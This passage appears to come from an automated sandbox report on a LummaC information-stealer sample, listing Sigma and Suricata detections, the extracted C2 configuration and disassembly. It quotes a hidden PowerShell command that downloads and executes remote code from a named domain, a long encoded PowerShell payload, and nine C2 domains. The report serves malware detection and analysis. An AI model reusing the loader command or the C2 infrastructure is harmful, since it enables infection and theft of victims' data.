EAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: Usage Of Web Request Commands And Cmdlets
                              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA

                              Data Obfuscation

                              barindex
                              Sigma detected: Powershell Download and Execute IEX
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-15T18:25:37.924897+010020283713Unknown Traffic192.168.2.657621104.21.64.1443TCP
                              2025-01-15T18:25:38.896128+010020283713Unknown Traffic192.168.2.657628104.21.64.1443TCP
                              2025-01-15T18:25:40.048427+010020283713Unknown Traffic192.168.2.657635104.21.64.1443TCP
                              2025-01-15T18:25:41.286889+010020283713Unknown Traffic192.168.2.657644104.21.64.1443TCP
                              2025-01-15T18:25:42.637956+010020283713Unknown Traffic192.168.2.657654104.21.64.1443TCP
                              2025-01-15T18:25:44.015585+010020283713Unknown Traffic192.168.2.657662104.21.64.1443TCP
                              2025-01-15T18:25:45.850746+010020283713Unknown Traffic192.168.2.657675104.21.64.1443TCP
                              2025-01-15T18:25:49.199005+010020283713Unknown Traffic192.168.2.657694104.21.64.1443TCP
                              2025-01-15T18:25:50.205910+010020283713Unknown Traffic192.168.2.657702172.67.212.45443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-15T18:25:38.391221+010020546531A Network Trojan was detected192.168.2.657621104.21.64.1443TCP
                              2025-01-15T18:25:39.411857+010020546531A Network Trojan was detected192.168.2.657628104.21.64.1443TCP
                              2025-01-15T18:25:49.687177+010020546531A Network Trojan was detected192.168.2.657694104.21.64.1443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-15T18:25:38.391221+010020498361A Network Trojan was detected192.168.2.657621104.21.64.1443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-15T18:25:39.411857+010020498121A Network Trojan was detected192.168.2.657628104.21.64.1443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-15T18:25:40.793143+010020480941Malware Command and Control Activity Detected192.168.2.657635104.21.64.1443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Found malware configuration
                              Source: 10.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["immolatechallen.bond", "growthselec.bond", "idealizetreez.shop", "jarry-fixxer.bond", "jarry-deatile.bond", "crookedfoshe.bond", "pain-temper.bond", "stripedre-lot.bond", "strivehelpeu.bond"], "Build id": "c2CoW0--RIII"}
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
                              Sample uses string decryption to hide its real strings
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: jarry-fixxer.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pain-temper.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: jarry-deatile.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: growthselec.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: stripedre-lot.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immolatechallen.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crookedfoshe.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: strivehelpeu.bond
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: idealizetreez.shop
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                              Source: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: c2CoW0--RIII
                              Source: unknownHTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.6:49715 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.6:57600 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57621 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57628 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57635 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57644 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57654 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57662 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57675 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:57694 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.212.45:443 -> 192.168.2.6:57702 version: TLS 1.2
                              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2735376513.000000000CC49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2510709371.0000000007570000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2735376513.000000000CC49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2510709371.0000000007570000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmp
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+04h]10_2_00424801
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp], ebx10_2_0040E146
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 625B9FB1h10_2_0043F193
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]10_2_0042E435
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_0042E435
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]10_2_0042E435
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-6C72C924h]10_2_00439FB0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_00437840
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0040A019
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_0042A896
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00408100
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+44h]10_2_0041A910
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push ebp10_2_004299F3
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h10_2_004409B0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_004161BC
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00427A40
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push edi10_2_00429A63
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push edi10_2_00429A63
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh10_2_00402220
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_00429A23
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h10_2_00427A20
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add esi, FFFFFFFEh10_2_0041C230
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-40188905h]10_2_00429230
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx10_2_0041BAD2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax+00h]10_2_0040AAE0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*4+00001118h]10_2_004072E0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_004192E0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, ecx10_2_004192E0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-18h], ebx10_2_0042A2F3
